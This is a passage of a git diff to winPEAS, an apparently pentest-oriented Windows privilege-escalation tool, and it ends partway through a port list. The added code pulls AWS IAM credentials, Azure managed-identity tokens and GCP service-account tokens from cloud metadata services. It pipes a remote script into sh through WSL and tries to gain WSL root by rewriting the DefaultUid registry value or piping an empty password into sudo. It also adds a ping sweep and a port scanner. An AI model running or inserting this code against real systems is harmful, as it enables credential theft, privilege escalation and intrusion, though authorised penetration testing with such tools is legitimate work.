catch (Exception)
@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path))
{
string folder = Path.GetDirectoryName(path);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary<string, string>
{
@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}

201
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs Normal file
View File

@ -0,0 +1,201 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class AWSInfo : CloudInfoBase
{
/*
* notes - possible identification:
*
- "c:\Program Files\Amazon\EC2Launch"
- "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
- "c:\Program Files (x86)\AWS SDK for .NET"
- get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
*/
const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
public override string Name => "AWS EC2";
private Dictionary<string, List<EndpointData>> _endpointData = null;
public override bool IsCloud => Directory.Exists(AWS_FOLDER);
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
_endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
_endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
_endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
_endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
_endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
_endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
/*
* print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
*
*/
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetSecurityCredentialsMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetUserDataMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("user-data", "latest/user-data", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetIAMRoleMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>
{
new Tuple<string, string, bool>("iam/info", "iam/info", false)
};
var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
foreach (var role in roles.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>(role, $"iam/security-credentials/{role}", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetNetworkMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
var urlBase = "network/interfaces/macs";
foreach (var mac in macs.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Owner ID", $"{urlBase}/{mac}/owner-id", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Security Groups", $"{urlBase}/{mac}/security-groups", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetAccountMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("account info", "identity-credentials/ec2/info", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetGeneralMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ami id", "ami-id", false),
new Tuple<string, string, bool>("instance action","instance-action", false),
new Tuple<string, string, bool>("instance id","instance-id", false),
new Tuple<string, string, bool>("instance life-cycle","instance-life-cycle", false),
new Tuple<string, string, bool>("instance type","instance-type", false),
new Tuple<string, string, bool>("placement/region","placement/region", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData, string apiToken)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
}
}
}

88
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs Normal file
View File

@ -0,0 +1,88 @@
using System.Collections.Generic;
using System.IO;
using System.Net;
using System;
namespace winPEAS.Info.CloudInfo
{
internal class AzureInfo : CloudInfoBase
{
public override string Name => "Azure VM";
public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
const string API_VERSION = "2021-12-13";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
List<EndpointData> _endpointDataList = new List<EndpointData>();
try
{
string result;
List<Tuple<string, string, bool>> endpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Details", $"instance?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
new Tuple<string, string, bool>("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
new Tuple<string, string, bool>("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
new Tuple<string, string, bool>("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
};
if (IsAvailable)
{
foreach (var tuple in endpoints)
{
string url = $"{AZURE_BASE_URL}{tuple.Item2}";
result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
}
else
{
foreach (var endpoint in endpoints)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = endpoint.Item1,
Data = null,
IsAttackVector = false
});
}
}
_endpointData.Add("General", _endpointDataList);
}
catch (Exception ex)
{
}
}
return _endpointData;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
}
}
}

77
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs Normal file
View File

@ -0,0 +1,77 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace winPEAS.Info.CloudInfo
{
internal abstract class CloudInfoBase
{
public abstract string Name { get; }
public abstract bool IsCloud { get; }
public abstract Dictionary<string, List<EndpointData>> EndpointDataList();
public abstract bool TestConnection();
private bool? _isAvailable;
public bool IsAvailable
{
get
{
if (_isAvailable == null)
{
_isAvailable = TestConnection();
}
return _isAvailable.Value;
}
}
protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
{
try
{
var request = WebRequest.CreateHttp(url);
if (headers != null)
{
request.Headers = headers;
}
request.Method = method;
using (var response = (HttpWebResponse)request.GetResponse())
{
using (var responseStream = response.GetResponseStream())
{
// Get a reader capable of reading the response stream
using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
{
// Read stream content as string
var content = myStreamReader.ReadToEnd();
return content;
}
}
}
}
catch (WebException exception)
{
if (exception.InnerException != null)
{
return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
}
}
catch (Exception ex)
{
return string.Empty;
}
return string.Empty;
}
}
}

10
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs Normal file
View File

@ -0,0 +1,10 @@
namespace winPEAS.Info.CloudInfo
{
internal class EndpointData
{
public string EndpointName { get; set; }
public string Data { get; set; }
public bool IsAttackVector { get; set; }
}
}

208
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs Normal file
View File

@ -0,0 +1,208 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class GCPInfo : CloudInfoBase
{
public override string Name => "Google Cloud Platform";
const string GCP_BASE_URL = "http://{URL_BASE}/";
const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
/*
C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
c:\Program Files (x86)\Google\Cloud SDK"
http://metadata.google.internal
*/
public override bool IsCloud => Directory.Exists(GCP_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
_endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
_endpointData.Add("Instance Info", GetInstanceMetadataInfo());
_endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
_endpointData.Add("User Data", GetUserMetadataInfo());
_endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetServiceAccountsMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var serviceAccountsEndpointUrlBase = "instance/service-accounts";
var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
// TODO
// echo " Name: $sa" - ignored for now
foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetUserMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("startup-script", "instance/attributes/startup-script", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInterfacesMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var networkEndpointUrlBase = "instance/network-interfaces";
var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}";
var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
foreach (var iface in ifaces.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("IP", $"{networkEndpointUrlBase}/{iface}ip", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Network", $"{networkEndpointUrlBase}/{iface}network", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetInstanceMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Description", "instance/description", false),
new Tuple<string, string, bool>("Hostname", "instance/hostname", false),
new Tuple<string, string, bool>("Instance ID", "instance/id", false),
new Tuple<string, string, bool>("Instance Image", "instance/image", false),
new Tuple<string, string, bool>("Machine Type", "instance/machine-type", false),
new Tuple<string, string, bool>("Instance Name", "instance/name", false),
new Tuple<string, string, bool>("Instance tags", "instance/scheduling/tags", false),
new Tuple<string, string, bool>("Zone", "instance/zone", false),
new Tuple<string, string, bool>("K8s Cluster Location", "instance/attributes/cluster-location", false),
new Tuple<string, string, bool>("K8s Cluster name", "instance/attributes/cluster-name", false),
new Tuple<string, string, bool>("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false),
new Tuple<string, string, bool>("K8s Kube-labels", "instance/attributes/kube-labels", false),
new Tuple<string, string, bool>("K8s Kubeconfig", "instance/attributes/kubeconfig", false),
new Tuple<string, string, bool>("K8s Kube-env", "instance/attributes/kube-env", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetOSLoginMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("OSLogin users", "oslogin/users", false),
new Tuple<string, string, bool>("OSLogin Groups", "oslogin/groups", false),
new Tuple<string, string, bool>("OSLogin Security Keys", "oslogin/security-keys", false),
new Tuple<string, string, bool>("OSLogin Authorize", "oslogin/authorize", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetGCProjectMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Project-ID", "project/project-id", false),
new Tuple<string, string, bool>("Project Number", "project/numeric-project-id", false),
new Tuple<string, string, bool>("Project SSH-Keys", "project/attributes/ssh-keys", false),
new Tuple<string, string, bool>("All Project Attributes", "project/attributes/?recursive=true", false),
};
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result?.Trim(),
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null;
}
}
}

136
winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs Normal file
View File

@ -0,0 +1,136 @@
using System;
using System.Diagnostics;
using System.Text;
using winPEAS.Helpers.Registry;
namespace winPEAS.Info.FilesInfo.WSL
{
public class WSLHelper
{
public static void RunLinpeas(string linpeasUrl)
{
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
var cmd = CreateUnixCommand(linpeasCmd);
ExecuteCommand(cmd.Item1, cmd.Item2);
}
internal static Tuple<string, string> CreateUnixCommand(string command, string distributionName = null)
{
string wsl = Environment.Is64BitProcess
? "wsl.exe"
: Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe";
string distributionParam = !string.IsNullOrEmpty(distributionName)
? $"--distribution {distributionName}"
: string.Empty;
string args = $"{distributionParam} -- {command}";
return new Tuple<string, string>(wsl, args);
}
static string GetWSLUser(string distributionName)
{
string command = "whoami";
var cmd = CreateUnixCommand(command, distributionName);
var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim();
return user;
}
internal static string TryGetRootUser(string distributionName, string distributionGuid)
{
string hive = "HKCU";
string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}";
string key = "DefaultUid";
string wslUser = GetWSLUser(distributionName);
string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0";
string root = $"root ({exploit})";
if (string.Equals(wslUser, "root"))
{
return "root";
}
var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key);
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
wslUser = GetWSLUser(distributionName);
if (string.Equals(wslUser, "root"))
{
RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
return root;
}
}
// try sudo without password
exploit = "sudo with empty password";
var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
if (output == "root")
{
return $"root ({exploit})";
}
return wslUser;
}
private static string ExecuteCommandWaitForOutput(string cmd, string args)
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = cmd;
p.StartInfo.Arguments = args;
p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
p.Start();
string output = p.StandardOutput.ReadToEnd()?.Trim();
p.WaitForExit();
return output;
}
private static void ExecuteCommand(
string command,
string args = null,
string workingFolder = null
)
{
var processStartInfo = new ProcessStartInfo
{
UseShellExecute = false,
Verb = "OPEN",
CreateNoWindow = true,
FileName = command,
WorkingDirectory = workingFolder,
Arguments = args,
RedirectStandardOutput = true,
RedirectStandardError = true,
StandardOutputEncoding = Encoding.UTF8
};
using (var process = Process.Start(processStartInfo))
{
if (process != null)
{
while (!process.StandardOutput.EndOfStream)
{
Console.WriteLine(process.StandardOutput.ReadLine());
}
while (!process.StandardError.EndOfStream)
{
Console.WriteLine(process.StandardError.ReadLine());
}
}
}
}
}
}

56
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs Normal file
View File

@ -0,0 +1,56 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetPinger
{
private int PingTimeout = 1000;
public List<string> HostsAlive = new List<string>();
private List<string> ipRange = new List<string>();
public void AddRange(string baseIpAddress, string netmask)
{
var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
ipRange.AddRange(range);
}
public void AddRange(IEnumerable<string> ipAddressList)
{
ipRange.AddRange(ipAddressList);
}
public async Task RunPingSweepAsync()
{
var tasks = new List<Task>();
foreach (var ip in ipRange)
{
Ping p = new Ping();
var task = PingAndUpdateStatus(p, ip);
tasks.Add(task);
}
await Task.WhenAll(tasks);
}
private async Task PingAndUpdateStatus(Ping ping, string ip)
{
var reply = await ping.SendPingAsync(ip, PingTimeout);
if (reply.Status == IPStatus.Success)
{
HostsAlive.Add(ip);
await Console.Out.WriteLineAsync(ip);
}
}
}
}

93
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs Normal file
View File

@ -0,0 +1,93 @@
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using winPEAS.Helpers;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetworkScanner
{
enum ScanMode
{
Auto,
IPAddressList,
IPAddressNetmask,
}
private string[] ipAddressList;
private bool isAuto = false;
private ScanMode scanMode = ScanMode.IPAddressList;
private string baseAddress;
private string netmask;
IEnumerable<int> ports;
public NetworkScanner(string options, IEnumerable<int> ports = null)
{
/*
--network "auto" - find interfaces/hosts automatically
--network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
--network "10.10.10.10/24" - scan host based on ip address/netmask
*/
this.ports = ports;
if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
{
scanMode = ScanMode.Auto;
}
else if (options.Contains("/"))
{
var parts = options.Split('/');
baseAddress = parts[0];
netmask = parts[1];
scanMode = ScanMode.IPAddressNetmask;
}
else
{
ipAddressList = options.Split(',');
scanMode = ScanMode.IPAddressList;
}
}
public void Scan()
{
try
{
Beaprint.GreatPrint("Scanning network (it might take some time)...");
List<string> aliveHosts = new List<string>();
NetPinger netPinger = new NetPinger();
if (scanMode == ScanMode.Auto)
{
// this is the "auto" mode
foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
{
netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
}
}
if (scanMode == ScanMode.IPAddressNetmask)
{
netPinger.AddRange(baseAddress, netmask);
}
else if (scanMode == ScanMode.IPAddressList)
{
netPinger.AddRange(ipAddressList);
}
var task = netPinger.RunPingSweepAsync();
task.Wait();
aliveHosts.AddRange(netPinger.HostsAlive);
PortScanner ps = new PortScanner(this.ports);
Parallel.ForEach(aliveHosts, host =>
{
ps.Start(host);
});
}
catch (Exception e)
{
Beaprint.PrintException(e.Message);
}
}
}
}

221
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs Normal file
View File

@ -0,0 +1,221 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal static class NetworkUtils
{
/// <summary>
/// IPAddress to UInteger
/// </summary>
/// <param name="ipAddress"></param>
/// <returns></returns>
public static uint IPToUInt(this string ipAddress)
{
if (string.IsNullOrEmpty(ipAddress))
return 0;
if (IPAddress.TryParse(ipAddress, out IPAddress ip))
{
var bytes = ip.GetAddressBytes();
Array.Reverse(bytes);
return BitConverter.ToUInt32(bytes, 0);
}
else
return 0;
}
/// <summary>
/// IP in Uinteger to string
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static string IPToString(this uint ipUInt)
{
return ToIPAddress(ipUInt).ToString();
}
/// <summary>
/// IP in Uinteger to IPAddress
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static IPAddress ToIPAddress(this uint ipUInt)
{
var bytes = BitConverter.GetBytes(ipUInt);
Array.Reverse(bytes);
return new IPAddress(bytes);
}
/// <summary>
/// First and Last IPv4 from IP + Mask
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
/// </remarks>
public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
{
uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
return Array.ConvertAll(uiIpRange, x => IPToString(x));
}
/// <summary>
/// First and Last IPv4 + Mask.
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// First IP is not usable and last is reserverd for broadcast.
/// Can use all IPs in between
/// </remarks>
public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
{
uint sub;
//check if mask is CIDR Notation
if (mask.Contains("."))
{
sub = IPToUInt(mask);
}
else
{
sub = ~(0xffffffff >> Convert.ToInt32(mask));
}
uint ip2 = IPToUInt(ipv4);
uint first = ip2 & sub;
uint last = first | (0xffffffff & ~sub);
if (filterUsable)
{
first += 1;
last -= 1;
}
return new uint[] { first, last };
}
public static IEnumerable<string> GetIPRange(IPAddress startIP, IPAddress endIP)
{
uint sIP = ipToUint(startIP.GetAddressBytes());
uint eIP = ipToUint(endIP.GetAddressBytes());
while (sIP <= eIP)
{
yield return new IPAddress(reverseBytesArray(sIP)).ToString();
sIP++;
}
}
public static string CidrToNetmask(int cidr)
{
var nmask = 0xFFFFFFFF;
nmask <<= 32 - cidr;
byte[] bytes = BitConverter.GetBytes(nmask);
Array.Reverse(bytes);
nmask = BitConverter.ToUInt32(bytes, 0);
var netmask = new System.Net.IPAddress(nmask);
return netmask.ToString();
}
public static IEnumerable<string> GetIPAddressesByNetmask(string ipAddress, string netmask)
{
// TODO
// e.g.
// netmask should be e.g. 24 - currently we only support this format
string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
return range;
}
public static IEnumerable<string> GetHostsByIPAndNetmask(string ipAddressAndNetmask)
{
// TODO
// get hosts by ip address & netmask
// https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
// we nned to (maybe in parallel)
// - ping e.g. 3 times
// - scan top 5 ports
var parts = ipAddressAndNetmask.Split(':');
return new List<string>
{
parts[0]
};
}
public static List<Tuple<string, string>> GetInternalInterfaces()
{
List<Tuple<string, string>> result = new List<Tuple<string, string>>();
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.OperationalStatus == OperationalStatus.Up &&
(ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
{
// Console.WriteLine();
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
// we need ip address and a netmask as well
result.Add(new Tuple<string, string>(ip.Address.ToString(), ip.IPv4Mask.ToString()));
}
}
}
}
return result;
}
/* Convert bytes array to 32 bit long value */
static uint ipToUint(byte[] ipBytes)
{
ByteConverter bConvert = new ByteConverter();
uint ipUint = 0;
int shift = 24; // indicates number of bits left for shifting
foreach (byte b in ipBytes)
{
if (ipUint == 0)
{
ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
shift -= 8;
continue;
}
if (shift >= 8)
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
else
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
shift -= 8;
}
return ipUint;
}
/* reverse byte order in array */
private static uint reverseBytesArray(uint ip)
{
byte[] bytes = BitConverter.GetBytes(ip);
bytes = bytes.Reverse().ToArray();
return (uint)BitConverter.ToInt32(bytes, 0);
}
}
}

122
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs Normal file
View File

@ -0,0 +1,122 @@
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
class PortScanner
{
private int TcpTimeout = 500; // ms
#region nmap tcp top 1000
static List<int> nmapTop1000TCPPorts = new List<int>
{
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
